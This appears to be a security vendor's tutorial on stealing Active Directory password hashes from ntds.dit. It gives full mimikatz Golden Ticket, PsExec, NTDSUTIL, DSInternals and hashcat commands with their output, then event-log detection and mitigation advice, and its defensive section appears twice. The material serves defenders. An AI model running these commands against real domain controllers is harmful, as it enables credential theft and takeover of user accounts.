NTDS.dit Password Extraction
All data in Active Directory is stored in the file ntds.dit (“the dit”) on every domain controller (in C:\Windows\NTDS\ by default). Attackers can use the password hashes direct from the dit to advance objectives. Cracking user passwords is beneficial even if an adversary has already obtained domain dominance, as users frequently re-use passwords across domain-joined and non-domain-joined systems and applications.
To gain access to the ntds.dit file on a domain controller, an adversary must have already gained administrator access to Active Directory. Alternatively, an adversary could compromise the enterprise backup solution responsible for backing up domain controllers and copy ntds.dit from a backup. Most organizations do not frequently rotate the krbtgt secret (see the Golden Ticket attack) so even older backups can be useful.
Attack Tutorial: How NTDS.dit Password Extraction Works
ntds.dit
. As this requirement makes ntds.dit
extraction a late-stage attack, an adversary could use a previously compromised password hash for a domain controller’s computer account to create a Silver Ticket.In the example below, the adversary uses mimikatz to gain access to a domain controller’s file system via a Golden Ticket.
PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"
User : FakeUser1
Domain : domain.com (DOMAIN)
SID : S-1-5-21-441320023-234525631-506766575
User Id : 0
Groups Id : *513 512 520 518 519
ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt
Service : HOST
Target : DC1.domain.com
Lifetime : 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320
# A new command prompt window opens
C:\Windows\System32>
ntds.dit
as well as the HKEY_LOCAL_MACHINE\SYSTEM
registry hive, which is required to obtain the Boot Key for decrypting ntds.dit
.Note that while Active Directory is running, it maintains a file system lock on the
ntds.dit
file, so attempts to copy it will fail. Adversaries have multiple ways to get around this constraint; in particular, they can:- Simply stop Active Directory (though this is likely to result in being detected).
- Use the Volume Shadow Copy Service (VSS) to snapshot the volume and extract
ntds.dit
from the snapshot. - Use a PowerShell tool like PowerSploit’s
Invoke-NinjaCopy
to copy the files even though they are in use. - Use a built-in tool like
DSDBUtil.exe
orNTDSUtil.exe
to create active directory installation media files.
PS> .\PSExec.exe \\dc1.domain.com cmd
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDS
Active instance set to "NTDS".
NTDSUTIL: IFM
ifm: Create Full S:\Files
Creating snapshot...
Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\
Initiating DEFRAGMENTATION mode...
Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit
Target Database: S:\Files\Active Directory\ntds.dit
Defragmentation Status (Complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
Copying S:\Files\registry\SYSTEM
Copying S:\Files\registry\SECURITY
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.
IFM media created successfully in S:\Files
ifm: q
NTDSUTIL: q
DC1 > Copy S:\Files \\wks2\Share
ntds.dit
and the HKLM\SYSTEM
registry hive, they no longer require access to the organization’s network. An adversary interested in cracking the passwords will often want to run a brute-force attack with a computer optimized for that purpose, but first they’ll need to extract the hashes from ntds.dit
. The DSInternals PowerShell module provides the Get-BootKey
and Get-ADDBAccount
cmdlets for this purpose.
$Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM
Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |
Format-Custom -View HashcatNT |
Out-File C:\Hashdump.txt
PS> Get-Content C:\Hashdump.txt
f8ae01fc52f45dda7baf7a67721665f1
eed224b4784bb040aab50b8856fe9f02
# --- Output Truncated --- #
PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1
Session..........: hashcat
Status...........: Running
Hash.Name........: NTLM
Hash.Target......: .\Hashdump.txt
Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)
Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
Recovered........: 1/41 (2.44%) Digests
Progress.........: 189030831226880/218340105584896 (86.58%)
Rejected.........: 0/189030831226880 (0.00%)
Restore.Point....: 793149440/916132832 (86.58%)
Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256
Candidates.#1....: TNAZRwMl -> FYNkI2Jx
Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16
PS> Get-Content .\cracked.txt
852e811a65d732c83214b4ff705d777a:F8qN47F1
PS> # Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API
PS> $Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked
PS> $Password = "F8qN47F1" # This is the password copied from cracked.txt
PS> $Object = New-Object -TypeName psobject
PS> $Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username
PS> $Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password
PS> $url = "https://service.url/api/login"
PS> $body = $Object | ConvertTo-Json
PS> $Header = @{ "accept" = "text/json"}
PS> $Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"
PS> $Headers = @{ 'Authorization' = "Bearer $Response" }
PS> $url = "https://service.url/api/DoThings"
PS> $Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers
PS> $Response
{ "statusCode": 200, "statusMessage": "Things Done!" }
Detect, Mitigate and Respond
ntds.dit
can be detected using the Windows event log. Event IDs 4663 and 4656 of the Audit File System subcategory can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit
.
ntds.dit
, use the following best practices to help ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place:- Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
- Rigorously follow the clean source principle for domain controllers: All infrastructure (e.g., ESX and attached storage) on which domain controllers reside or applications that service domain controllers (such as backup solutions) run must do so at the same security level as domain controllers themselves.
- Ensure the physical security of the domain controller machines. If physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
- Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.
ntds.dit
is expected, a full compromise of Active Directory must also be assumed; in particular, assume the krbtgt
secret was also compromised). Take the following action:- Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.
ntds.dit
can be detected using the Windows event log. Event IDs 4663 and 4656 of the Audit File System subcategory can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit
.
ntds.dit
, use the following best practices to help ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place:- Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
- Rigorously follow the clean source principle for domain controllers: All infrastructure (e.g., ESX and attached storage) on which domain controllers reside or applications that service domain controllers (such as backup solutions) run must do so at the same security level as domain controllers themselves.
- Ensure the physical security of the domain controller machines. If physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
- Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.
ntds.dit
is expected, a full compromise of Active Directory must also be assumed; in particular, assume the krbtgt
secret was also compromised). Take the following action:- Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.